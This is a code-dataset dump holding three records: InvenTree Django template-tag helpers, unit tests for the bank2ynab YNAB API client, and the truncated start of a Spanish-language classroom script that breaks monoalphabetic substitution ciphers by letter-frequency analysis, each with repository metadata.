def setting_object(key, *args, **kwargs):
"""
Return a setting object speciifed by the given key
(Or return None if the setting does not exist)
"""
setting = InvenTreeSetting.get_setting_object(key)
return setting
@register.simple_tag()
def settings_value(key, *args, **kwargs):
"""
Return a settings value specified by the given key
"""
return InvenTreeSetting.get_setting(key)
@register.simple_tag()
def get_color_theme_css(username):
try:
user_theme = ColorTheme.objects.filter(user=username).get()
user_theme_name = user_theme.name
if not user_theme_name or not ColorTheme.is_valid_choice(user_theme):
user_theme_name = 'default'
except ColorTheme.DoesNotExist:
user_theme_name = 'default'
# Build path to CSS sheet
inventree_css_sheet = os.path.join('css', 'color-themes', user_theme_name + '.css')
# Build static URL
inventree_css_static_url = os.path.join(settings.STATIC_URL, inventree_css_sheet)
return inventree_css_static_url
@register.simple_tag()
def authorized_owners(group):
""" Return authorized owners """
owners = []
try:
for owner in group.get_related_owners(include_group=True):
owners.append(owner.owner)
except AttributeError:
# group is None
pass
except TypeError:
# group.get_users returns None
pass
return owners
@register.simple_tag()
def object_link(url_name, pk, ref):
""" Return highlighted link to object """
ref_url = reverse(url_name, kwargs={'pk': pk})
return mark_safe('<b><a href="{}">{}</a></b>'.format(ref_url, ref))
class I18nStaticNode(StaticNode):
"""
custom StaticNode
replaces a variable named *lng* in the path with the current language
"""
def render(self, context):
self.path.var = self.path.var.format(lng=context.request.LANGUAGE_CODE)
ret = super().render(context)
return ret
# use the dynamic url - tag if in Debugging-Mode
if settings.DEBUG:
@register.simple_tag()
def i18n_static(url_name):
""" simple tag to enable {% url %} functionality instead of {% static %} """
return reverse(url_name)
else:
@register.tag('i18n_static')
def do_i18n_static(parser, token):
"""
Overrides normal static, adds language - lookup for prerenderd files #1485
usage (like static):
{% i18n_static path [as varname] %}
"""
bits = token.split_contents()
loc_name = settings.STATICFILES_I18_PREFIX
# change path to called ressource
bits[1] = f"'{loc_name}/{{lng}}.{bits[1][1:-1]}'"
token.contents = ' '.join(bits)
return I18nStaticNode.handle_token(parser, token)
| 26.182482
| 108
| 0.695707
|
import os
from django.utils.translation import ugettext_lazy as _
from django.conf import settings as djangosettings
from django import template
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.templatetags.static import StaticNode
from InvenTree import version, settings
import InvenTree.helpers
from common.models import InvenTreeSetting, ColorTheme
from common.settings import currency_code_default
register = template.Library()
@register.simple_tag()
def define(value, *args, **kwargs):
return value
@register.simple_tag()
def decimal(x, *args, **kwargs):
return InvenTree.helpers.decimal2string(x)
@register.simple_tag()
def str2bool(x, *args, **kwargs):
return InvenTree.helpers.str2bool(x)
@register.simple_tag()
def inrange(n, *args, **kwargs):
return range(n)
@register.simple_tag()
def multiply(x, y, *args, **kwargs):
return InvenTree.helpers.decimal2string(x * y)
@register.simple_tag()
def add(x, y, *args, **kwargs):
return x + y
@register.simple_tag()
def part_allocation_count(build, part, *args, **kwargs):
return InvenTree.helpers.decimal2string(build.getAllocatedQuantity(part))
@register.simple_tag()
def inventree_in_debug_mode(*args, **kwargs):
return djangosettings.DEBUG
@register.simple_tag()
def inventree_docker_mode(*args, **kwargs):
return djangosettings.DOCKER
@register.simple_tag()
def inventree_db_engine(*args, **kwargs):
db = djangosettings.DATABASES['default']
engine = db.get('ENGINE', _('Unknown database'))
engine = engine.replace('django.db.backends.', '')
return engine
@register.simple_tag()
def inventree_instance_name(*args, **kwargs):
return version.inventreeInstanceName()
@register.simple_tag()
def inventree_title(*args, **kwargs):
return version.inventreeInstanceTitle()
@register.simple_tag()
def inventree_version(*args, **kwargs):
return version.inventreeVersion()
@register.simple_tag()
def inventree_api_version(*args, **kwargs):
return version.inventreeApiVersion()
@register.simple_tag()
def django_version(*args, **kwargs):
return version.inventreeDjangoVersion()
@register.simple_tag()
def inventree_commit_hash(*args, **kwargs):
return version.inventreeCommitHash()
@register.simple_tag()
def inventree_commit_date(*args, **kwargs):
return version.inventreeCommitDate()
@register.simple_tag()
def inventree_github_url(*args, **kwargs):
return "https://github.com/InvenTree/InvenTree/"
@register.simple_tag()
def inventree_docs_url(*args, **kwargs):
return "https://inventree.readthedocs.io/"
@register.simple_tag()
def inventree_credits_url(*args, **kwargs):
return "https://inventree.readthedocs.io/en/latest/credits/"
@register.simple_tag()
def default_currency(*args, **kwargs):
return currency_code_default()
@register.simple_tag()
def setting_object(key, *args, **kwargs):
setting = InvenTreeSetting.get_setting_object(key)
return setting
@register.simple_tag()
def settings_value(key, *args, **kwargs):
return InvenTreeSetting.get_setting(key)
@register.simple_tag()
def get_color_theme_css(username):
try:
user_theme = ColorTheme.objects.filter(user=username).get()
user_theme_name = user_theme.name
if not user_theme_name or not ColorTheme.is_valid_choice(user_theme):
user_theme_name = 'default'
except ColorTheme.DoesNotExist:
user_theme_name = 'default'
inventree_css_sheet = os.path.join('css', 'color-themes', user_theme_name + '.css')
inventree_css_static_url = os.path.join(settings.STATIC_URL, inventree_css_sheet)
return inventree_css_static_url
@register.simple_tag()
def authorized_owners(group):
owners = []
try:
for owner in group.get_related_owners(include_group=True):
owners.append(owner.owner)
except AttributeError:
pass
except TypeError:
pass
return owners
@register.simple_tag()
def object_link(url_name, pk, ref):
ref_url = reverse(url_name, kwargs={'pk': pk})
return mark_safe('<b><a href="{}">{}</a></b>'.format(ref_url, ref))
class I18nStaticNode(StaticNode):
def render(self, context):
self.path.var = self.path.var.format(lng=context.request.LANGUAGE_CODE)
ret = super().render(context)
return ret
if settings.DEBUG:
@register.simple_tag()
def i18n_static(url_name):
return reverse(url_name)
else:
@register.tag('i18n_static')
def do_i18n_static(parser, token):
"""
Overrides normal static, adds language - lookup for prerenderd files #1485
usage (like static):
{% i18n_static path [as varname] %}
"""
bits = token.split_contents()
loc_name = settings.STATICFILES_I18_PREFIX
bits[1] = f"'{loc_name}/{{lng}}.{bits[1][1:-1]}'"
token.contents = ' '.join(bits)
return I18nStaticNode.handle_token(parser, token)
| true
| true
|
1c40dc2678afa914ac2937d94976a7a9a48cada1
| 16,761
|
py
|
Python
|
test/test_YNAB_API.py
|
MatissJanis/bank2ynab
|
ade89b2aa5062821540a2efd3f91594c8f930469
|
[
"MIT"
] | null | null | null |
test/test_YNAB_API.py
|
MatissJanis/bank2ynab
|
ade89b2aa5062821540a2efd3f91594c8f930469
|
[
"MIT"
] | null | null | null |
test/test_YNAB_API.py
|
MatissJanis/bank2ynab
|
ade89b2aa5062821540a2efd3f91594c8f930469
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from unittest.mock import patch
from os.path import join
import os
from shutil import copyfile
import configparser
from test.utils import get_test_confparser, get_project_dir
from bank2ynab.b2y_utilities import (
get_configs,
string_num_diff,
get_config_line,
option_selection,
)
from bank2ynab.ynab_api import YNAB_API
class Test_YNAB_API(TestCase):
def setUp(self):
self.TESTCONFPATH = join(get_project_dir(), "test-data", "test.conf")
self.TEMPCONFPATH = join(
get_project_dir(), "test-data", "temp-test.conf"
)
self.cp = get_test_confparser()
self.defaults = dict(self.cp.defaults())
self.test_class = None
# copy config file to temp location
copyfile(self.TESTCONFPATH, self.TEMPCONFPATH)
def tearDown(self):
# delete temp config file
if os.path.exists(self.TEMPCONFPATH):
os.remove(self.TEMPCONFPATH)
def test_init_and_name(self): # todo
""" Check parameters are correctly stored in the API object."""
"""
self.test_class = YNAB_API(self.defaults)
cfe = copy(self.defaults)
self.assertEqual(self.test_class.config, cfe)
self.assertEqual("DEFAULT", self.test_class.name)
"""
"""
def __init__(self, config_object, transactions=None):
self.transactions = []
self.account_ids = []
self.config = configparser.RawConfigParser()
self.config.read("user_configuration.conf")
self.api_token = self.config.get("DEFAULT", "YNAB API Access Token")
self.budget_id = None
"""
def test_run(self): # todo
"""
if self.api_token is not None:
logging.info("Connecting to YNAB API...")
# check for API token auth (and other errors)
error_code = self.list_budgets()
if error_code[0] == "ERROR":
return error_code
else:
# generate our list of budgets
budget_ids = self.list_budgets()
# if there's only one budget, silently set a default budget
if len(budget_ids) == 1:
self.budget_id = budget_ids[0]
budget_t_data = self.process_transactions(transaction_data)
for budget in budget_ids:
if budget_t_data[budget]["transactions"] != []:
self.post_transactions(budget_t_data[budget])
else:
logging.info("No API-token provided.")
"""
def test_api_read(self): # todo
"""
def api_read(self, budget, kwd):
General function for reading data from YNAB API
:param budget: boolean indicating if there's a default budget
:param kwd: keyword for data type, e.g. transactions
:return error_codes: if it fails we return our error
id = self.budget_id
api_t = self.api_token
base_url = "https://api.youneedabudget.com/v1/budgets/"
if budget is False:
# only happens when we're looking for the list of budgets
url = base_url + "?access_token={}".format(api_t)
else:
url = base_url + "{}/{}?access_token={}".format(id, kwd, api_t)
response = requests.get(url)
try:
read_data = response.json()["data"][kwd]
except KeyError:
# the API has returned an error so let's handle it
return self.process_api_response(response.json()["error"])
return read_data
"""
def test_process_transactions(self): # todo
"""
:param transaction_data: dictionary of bank names to transaction lists
logging.info("Processing transactions...")
# go through each bank's data
transactions = []
for bank in transaction_data:
# choose what account to write this bank's transactions to
account_id = self.select_account(bank)
# save transaction data for each bank in main dict
account_transactions = transaction_data[bank]
for t in account_transactions[1:]:
trans_dict = self.create_transaction(
account_id, t, transactions)
transactions.append(trans_dict)
# compile our data to post
data = {
"transactions": transactions
}
return data
"""
def test_create_transaction(self):
test_class = YNAB_API(self.cp)
test_transactions = [
(
["2019-01-01", "Mimsy", "Category", "Memo", 400, 0],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": -400000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-400000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Mimsy", "Category", "Memo", 400, ""],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": -400000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-400000:2019-01-01:2",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Mimsy", "Category", "Memo", "", 500],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": 500000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:500000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Borogrove", "Category", "Memo", 600, ""],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Borogrove",
"amount": -600000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-600000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
]
transactions = []
for test_row, target_transaction in test_transactions:
test_transaction = test_class.create_transaction(
"account_id", test_row, transactions
)
transactions.append(test_transaction)
for key in test_transaction:
self.assertEqual(
target_transaction[key], test_transaction[key]
)
def test_create_import_id(self):
test_class = YNAB_API(self.cp)
test_values = [
(100, "2019-01-01", "YNAB:100:2019-01-01:1"), # no duplicate
(200, "2019-01-01", "YNAB:200:2019-01-01:2"), # 1 duplicate
(300, "2019-01-01", "YNAB:300:2019-01-01:3"), # 2 duplicates
(400, "2019-01-01", "YNAB:400:2019-01-01:1"), # no duplicate
(500, "2019-01-01", "YNAB:500:2019-01-01:1"), # no duplicate
(600, "2019-01-01", "YNAB:600:2019-01-01:2"), # 1 duplicate
]
test_transactions = [
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 200,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:200:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 300,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:300:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 300,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:300:2019-01-01:2",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 600,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:600:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
]
for amount, date, target_id in test_values:
id = test_class.create_import_id(amount, date, test_transactions)
self.assertEqual(id, target_id)
def test_post_transactions(self): # todo
"""
def post_transactions(self, budget_id, data):
# send our data to API
logging.info("Uploading transactions to YNAB...")
url = ("https://api.youneedabudget.com/v1/budgets/" +
"{}/transactions?access_token={}".format(
budget_id,
self.api_token))
post_response = requests.post(url, json=data)
# response handling - TODO: make this more thorough!
try:
self.process_api_response(json.loads(post_response.text)["error"])
except KeyError:
logging.info("Success!")
"""
def test_list_transactions(self): # todo
"""
def list_transactions(self):
transactions = self.api_read(True, "transactions")
if transactions[0] == "ERROR":
return transactions
if len(transactions) > 0:
logging.debug("Listing transactions:")
for t in transactions:
logging.debug(t)
else:
logging.debug("no transactions found")
"""
def test_list_accounts(self): # todo
"""
def list_accounts(self):
accounts = self.api_read(True, "accounts")
if accounts[0] == "ERROR":
return accounts
account_ids = list()
if len(accounts) > 0:
for account in accounts:
account_ids.append([account["name"], account["id"]])
# debug messages
logging.debug("id: {}".format(account["id"]))
logging.debug("on_budget: {}".format(account["on_budget"]))
logging.debug("closed: {}".format(account["closed"]))
else:
logging.info("no accounts found")
return account_ids
"""
def test_list_budgets(self): # todo
"""
def list_budgets(self):
budgets = self.api_read(False, "budgets")
if budgets[0] == "ERROR":
return budgets
budget_ids = list()
for budget in budgets:
budget_ids.append([budget["name"], budget["id"]])
commented out because this is a bit messy and confusing
# TODO: make this legible!
# debug messages:
# for key, value in budget.items():
if(type(value) is dict):
logging.debug("%s: " % str(key))
for subkey, subvalue in value.items():
logging.debug(" %s: %s" %
(str(subkey), str(subvalue)))
else:
logging.debug("%s: %s" % (str(key), str(value)))
return budget_ids
"""
def test_process_api_response(self): # todo
"""
def process_api_response(self, details):
Prints details about errors returned by the YNAB api
:param details: dictionary of returned error info from the YNAB api
:return id: HTTP error ID
:return detail: human-understandable explanation of error
# TODO: make this function into a general response handler instead
errors = {
"400": "Bad syntax or validation error",
"401": "API access token missing, invalid,
revoked, or expired",
"403.1": "The subscription for this account has lapsed.",
"403.2": "The trial for this account has expired.",
"404.1": "The specified URI does not exist.",
"404.2": "Resource not found",
"409": "Conflict error",
"429": "Too many requests. Wait a while and try again.",
"500": "Unexpected error"
}
id = details["id"]
name = details["name"]
detail = errors[id]
logging.error("{} - {} ({})".format(id, detail, name))
return ["ERROR", id, detail]
"""
@patch("b2y_utilities.option_selection")
@patch.object(YNAB_API, "list_accounts")
def test_select_account(self, mock_list_acs, mock_option_sel):
"""
Test account selection logic
"""
test_class = YNAB_API(self.cp)
test_banks = [
("test_api_existing_bank", "Test Budget ID 1", "Test Account ID"),
("New Bank", "Test Budget ID 2", "ID #2"),
]
test_class.config_path = self.TEMPCONFPATH
test_class.config = configparser.RawConfigParser()
test_class.config.read(test_class.config_path)
mock_ids = [
("Account 1", "Test Budget ID 1", "ID #1"),
("Account 2", "Test Budget ID 2", "ID #2"),
("Account 3", "Test Budget ID 1", "ID #3"),
]
mock_list_acs.return_value = mock_ids
mock_option_sel.side_effect = ["Test Budget ID 2", "ID #2"]
for bank, budget_id, ac_id in test_banks:
b_id, a_id = test_class.select_account(bank)
self.assertEqual(b_id, budget_id)
self.assertEqual(a_id, ac_id)
def test_save_account_selection(self):
"""
Test that account info is saved under the correct bank and
in the correct file.
"""
test_class = YNAB_API(self.cp)
test_budget_id = "Test Budget ID"
test_account_id = "Test Account ID"
test_banks = ["New Bank", "Existing Bank"]
test_class.config_path = self.TEMPCONFPATH
test_class.config = configparser.RawConfigParser()
test_class.config.read(test_class.config_path)
# save test bank details to test config
for test_bank in test_banks:
test_class.save_account_selection(
test_bank, test_budget_id, test_account_id
)
# check test config for test bank details & make sure ID matches
config = configparser.RawConfigParser()
config.read(test_class.user_config_path)
for test_bank in test_banks:
test_id = config.get(test_bank, "YNAB Account ID")
self.assertEqual(
test_id, "{}||{}".format(test_budget_id, test_account_id)
)
| 36.837363
| 82
| 0.499672
|
from unittest import TestCase
from unittest.mock import patch
from os.path import join
import os
from shutil import copyfile
import configparser
from test.utils import get_test_confparser, get_project_dir
from bank2ynab.b2y_utilities import (
get_configs,
string_num_diff,
get_config_line,
option_selection,
)
from bank2ynab.ynab_api import YNAB_API
class Test_YNAB_API(TestCase):
def setUp(self):
self.TESTCONFPATH = join(get_project_dir(), "test-data", "test.conf")
self.TEMPCONFPATH = join(
get_project_dir(), "test-data", "temp-test.conf"
)
self.cp = get_test_confparser()
self.defaults = dict(self.cp.defaults())
self.test_class = None
copyfile(self.TESTCONFPATH, self.TEMPCONFPATH)
def tearDown(self):
if os.path.exists(self.TEMPCONFPATH):
os.remove(self.TEMPCONFPATH)
def test_init_and_name(self):
def test_run(self):
def test_api_read(self):
def test_process_transactions(self):
def test_create_transaction(self):
test_class = YNAB_API(self.cp)
test_transactions = [
(
["2019-01-01", "Mimsy", "Category", "Memo", 400, 0],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": -400000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-400000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Mimsy", "Category", "Memo", 400, ""],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": -400000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-400000:2019-01-01:2",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Mimsy", "Category", "Memo", "", 500],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Mimsy",
"amount": 500000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:500000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
(
["2019-01-01", "Borogrove", "Category", "Memo", 600, ""],
{
"account_id": "account_id",
"date": "2019-01-01",
"payee_name": "Borogrove",
"amount": -600000,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:-600000:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
),
]
transactions = []
for test_row, target_transaction in test_transactions:
test_transaction = test_class.create_transaction(
"account_id", test_row, transactions
)
transactions.append(test_transaction)
for key in test_transaction:
self.assertEqual(
target_transaction[key], test_transaction[key]
)
def test_create_import_id(self):
test_class = YNAB_API(self.cp)
test_values = [
(100, "2019-01-01", "YNAB:100:2019-01-01:1"),
(200, "2019-01-01", "YNAB:200:2019-01-01:2"),
(300, "2019-01-01", "YNAB:300:2019-01-01:3"),
(400, "2019-01-01", "YNAB:400:2019-01-01:1"),
(500, "2019-01-01", "YNAB:500:2019-01-01:1"),
(600, "2019-01-01", "YNAB:600:2019-01-01:2"),
]
test_transactions = [
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 200,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:200:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 300,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:300:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 300,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:300:2019-01-01:2",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
{
"account_id": "Account",
"date": "2019-01-01",
"payee_name": "Person",
"amount": 600,
"memo": "Memo",
"category": "Category",
"cleared": "cleared",
"import_id": "YNAB:600:2019-01-01:1",
"payee_id": None,
"category_id": None,
"approved": False,
"flag_color": None,
},
]
for amount, date, target_id in test_values:
id = test_class.create_import_id(amount, date, test_transactions)
self.assertEqual(id, target_id)
def test_post_transactions(self):
def test_list_transactions(self):
def test_list_accounts(self):
def test_list_budgets(self):
def test_process_api_response(self):
@patch("b2y_utilities.option_selection")
@patch.object(YNAB_API, "list_accounts")
def test_select_account(self, mock_list_acs, mock_option_sel):
test_class = YNAB_API(self.cp)
test_banks = [
("test_api_existing_bank", "Test Budget ID 1", "Test Account ID"),
("New Bank", "Test Budget ID 2", "ID #2"),
]
test_class.config_path = self.TEMPCONFPATH
test_class.config = configparser.RawConfigParser()
test_class.config.read(test_class.config_path)
mock_ids = [
("Account 1", "Test Budget ID 1", "ID #1"),
("Account 2", "Test Budget ID 2", "ID #2"),
("Account 3", "Test Budget ID 1", "ID #3"),
]
mock_list_acs.return_value = mock_ids
mock_option_sel.side_effect = ["Test Budget ID 2", "ID #2"]
for bank, budget_id, ac_id in test_banks:
b_id, a_id = test_class.select_account(bank)
self.assertEqual(b_id, budget_id)
self.assertEqual(a_id, ac_id)
def test_save_account_selection(self):
test_class = YNAB_API(self.cp)
test_budget_id = "Test Budget ID"
test_account_id = "Test Account ID"
test_banks = ["New Bank", "Existing Bank"]
test_class.config_path = self.TEMPCONFPATH
test_class.config = configparser.RawConfigParser()
test_class.config.read(test_class.config_path)
for test_bank in test_banks:
test_class.save_account_selection(
test_bank, test_budget_id, test_account_id
)
config = configparser.RawConfigParser()
config.read(test_class.user_config_path)
for test_bank in test_banks:
test_id = config.get(test_bank, "YNAB Account ID")
self.assertEqual(
test_id, "{}||{}".format(test_budget_id, test_account_id)
)
| true
| true
|
1c40dc425318deef0d4cb09f150ed1883e6fefef
| 12,187
|
py
|
Python
|
uem/criptoanalisis/mono.py
|
junquera/my-crypto-works
|
8ef1b207a97fd5ee7eb53f985edc73813a0f8fc0
|
[
"MIT"
] | null | null | null |
uem/criptoanalisis/mono.py
|
junquera/my-crypto-works
|
8ef1b207a97fd5ee7eb53f985edc73813a0f8fc0
|
[
"MIT"
] | null | null | null |
uem/criptoanalisis/mono.py
|
junquera/my-crypto-works
|
8ef1b207a97fd5ee7eb53f985edc73813a0f8fc0
|
[
"MIT"
] | 1
|
2018-07-16T22:03:44.000Z
|
2018-07-16T22:03:44.000Z
|
#!/bin/env python3
'''
[ ANÁLISIS ESTADÍSTICO DE TEXTO ]
[ CIFRADO POR SUSTITUCIÓN MONOALFABÉTICA ]
Javier Junquera Sánchez <javier@junquera.xyz>
Fases:
1. Análisis de entropía
2. Análisis de aparición de caracteres
3. Análisis de caracteres repetidos juntos (RR, LL)
4. Análisis de dupletas repetidas
5. Generación de posibles traducciones basado en estadísticas de idioma
6. Uso de estadísticas para cifrado afín
7. Fuerza bruta afín, césar y atbash
'''
import re
from affine import decode_affine, affine_break
# BASADO EN EL QUIJOTE
estadisticas_castellano = {'A': 0.1203914356874436, 'B': 0.015130070791165134, 'C': 0.03719184102245509, 'D': 0.05437026585244542, 'E': 0.1386395633977034, 'F': 0.004934755557097172, 'G': 0.01092558720618012, 'H': 0.012658047516610746, 'I': 0.048772133465719646, 'J': 0.006582358140488471, 'K': 8.238012916956494e-05, 'L': 0.05551801306561237, 'M': 0.02788784162203377, 'N': 0.06781866708951004, 'O': 0.09582667220822723, 'P': 0.022245112473652295, 'Q': 0.02013110209127842, 'R': 0.06325617061234451, 'S': 0.07834783863652835, 'T': 0.03919621769909202, 'U': 0.048757887277968516, 'V': 0.011134324826707514, 'W': 0.00016847665514377192, 'X': 0.00025209558324821755, 'Y': 0.015759380650084517, 'Z': 0.004021760742090114}
estadisticas_castellano_esp = {' ': 1, 'A': 0.1203914356874436, 'B': 0.015130070791165134, 'C': 0.03719184102245509, 'D': 0.05437026585244542, 'E': 0.1386395633977034, 'F': 0.004934755557097172, 'G': 0.01092558720618012, 'H': 0.012658047516610746, 'I': 0.048772133465719646, 'J': 0.006582358140488471, 'K': 8.238012916956494e-05, 'L': 0.05551801306561237, 'M': 0.02788784162203377, 'N': 0.06781866708951004, 'O': 0.09582667220822723, 'P': 0.022245112473652295, 'Q': 0.02013110209127842, 'R': 0.06325617061234451, 'S': 0.07834783863652835, 'T': 0.03919621769909202, 'U': 0.048757887277968516, 'V': 0.011134324826707514, 'W': 0.00016847665514377192, 'X': 0.00025209558324821755, 'Y': 0.015759380650084517, 'Z': 0.004021760742090114}
# estadisticas_castellano = estadisticas_castellano_esp
# BASADO EN EL SEÑOR DE LOS ANILLO
estadisticas_ingles = {'A': 0.0831295411584481, 'B': 0.01738984496652256, 'C': 0.017155136950865266, 'D': 0.052443360917834525, 'E': 0.12285071813081565, 'F': 0.024581248091420035, 'G': 0.02449291711778557, 'H': 0.06476679361089449, 'I': 0.06393143497452282, 'J': 0.0006511254627912083, 'K': 0.009077900347519288, 'L': 0.04530117076396197, 'M': 0.022928197013403595, 'N': 0.06837322107728455, 'O': 0.0779066568745473, 'P': 0.013705181494913397, 'Q': 0.00058677003914324, 'R': 0.05933696247447866, 'S': 0.05987073392944122, 'T': 0.08989443186779629, 'U': 0.02559074493295679, 'V': 0.008983260018625218, 'W': 0.026715072040218356, 'X': 0.000682672239089232, 'Y': 0.019290222770715505, 'Z': 0.00036468073400515346}
with open('t.txt') as f:
t = f.read().replace(' ', '').replace('\n', '')
KEYWORDS = ['CRIP', 'CUANDO', 'EN', 'HA', 'HABIA', 'ERA', 'CONTRA', 'DESDE', 'SOLO', 'PERO', 'LE', 'SI', 'ESTA', 'AHORA', 'ALLI', 'SE', 'SEGUN', 'ANTE', 'SER', 'EL', 'POR', 'PARA', 'TAMBIEN', 'TODO', 'SUS', 'PORQUE', 'AQUI', 'YA', 'HACIA', 'A', 'CON', 'HAN', 'DEL', 'Y', 'AL', 'COMO', 'HASTA', 'QUE', 'O', 'UN', 'BAJO', 'LO', 'MAS', 'SU', 'LOS', 'SIN', 'NO', 'PUEDE', 'DOS', 'ENTRE', 'SOBRE', 'CIFR', 'MI', 'FUE', 'MUY', 'TRAS', 'LAS', 'LA', 'ES', 'SON', 'VEZ', 'ME', 'CABE', 'YO', 'HAY', 'ESTE', 'UNA', 'AÑOS', 'DE']
KEYWORDS_EN = list(set(['THE', 'IS', 'AND', 'WHO', 'HE', 'IT', 'WHERE', 'CRYPT', 'A']))
class Descifrado():
def __init__(self, text, key):
self.text = text
self.key = key
def __str__(self):
return "[%s] %s" % (self.key, self.text)
MAX = 5
def analiza_repetidos(t,i=2):
t = re.sub(r'[^A-Z]', '', t.upper())
res = {}
for j in range(len(t)):
ocur = t[j:j+i]
if len(ocur) < i:
continue
last = t[j:].find(ocur)
while last >= 0:
if ocur in res:
res[ocur].append(j+last)
else:
res[ocur] = [j+last]
n = t[j+last+1:].find(ocur)
if n >= 0:
last += n + 1
else:
last = -1
for x in res:
val = list(set(res[x]))
val.sort()
res[x] = val
return res
def calcula_distancias(v):
dist = []
for x in range(len(v))[1:]:
dist.append(v[x] - v[x-1])
return dist
def divisores(x):
res = []
for i in range(int(x/2))[2:]:
if x % i == 0:
res.append(i)
return res
def analisis_estadistico(txt):
txt = re.sub(r'[^A-Z]', '', txt.upper())
d = {chr(c + ord('A')): 0 for c in range(ord('Z') - ord('A') + 1)}
for x in txt:
if x in d:
d[x] += 1
else:
d[x] = 1
return {x: float(d[x])/len(txt) for x in d}
def gen_keys(cs, n, key):
if len(key) == len(cs):
return [key]
keys = []
for c in cs[n]:
keys += gen_keys(cs, n+1, key + c)
return keys
from math import gcd
def comun_divisor(values):
res = values[0]
for v in values[1:]:
aux = gcd(res, v)
if aux <= 2:
return res
res = aux
return res
def repetidos(t):
res = {}
for x in range(len(t) - 1):
if t[x] == t[x+1]:
c = t[x:x+1]
if c in res:
res[c].append(x)
else:
res[c] = [x]
return res
def representa_matrix(t, n=10):
res = ""
for i in range(len(t)):
if i % n == 0 and i > 0:
res += "\n"
res += "%c " % t[i]
return res
def translate(t, translations, n=1):
res = ""
while len(t):
c = t[:n]
t = t[n:]
res += translations.get(c, " ")
return res
def gen_translations(translations, translation):
translation_aux = {k: translation[k] for k in translation}
if len(translations) == 0:
r = translate(t, translation, n=n_gram)
trans_res.append(Descifrado(r, translation))
return
ts = translations.keys()
for i in ts:
ts_values = translations[i]
for j in ts_values:
# print(it)
# input(ts_values)
# input(j)
translation_aux[i] = j
# input(translations)
next = {k: translations[k] for k in translations if k!=i}
# input(next)
gen_translations(next, translation_aux)
break
english = False
def most_able(candidates, KEYWORDS=[]):
res = {}
for c in candidates:
kws = 0
for keyword in KEYWORDS:
if keyword in c.text:
kws += 1
if english:
for keyword in KEYWORDS_EN:
if keyword in c.text:
kws += 1
res[c] = kws
return {x[0]: x[1] for x in sorted(res.items(), key=lambda x: (x[1],x[0].text))[::-1]}
from entro import entropy
# Entropía del texto
e = entropy(t)
# Análisis estadístico de los caracteres del texto
multigram = False
if multigram:
print("ANÁLISIS POLIALFABÉTICO")
n_gram = int(input("Ngram > "))
else:
print("- ANÁLISIS MONOALFABÉTICO:")
n_gram = 1
ar = analiza_repetidos(t, i=n_gram)
d = {x: len(ar[x]) for x in ar}
estadisticas = {x[0]: x[1] for x in sorted(d.items(), key=lambda x: (x[1],x[0]))[::-1]}
conv_estadisticas_es = {x[0]: x[1] for x in sorted(estadisticas_castellano.items(), key=lambda x: (x[1],x[0]))[::-1]}
conv_estadisticas_en = {x[0]: x[1] for x in sorted(estadisticas_ingles.items(), key=lambda x: (x[1],x[0]))[::-1]}
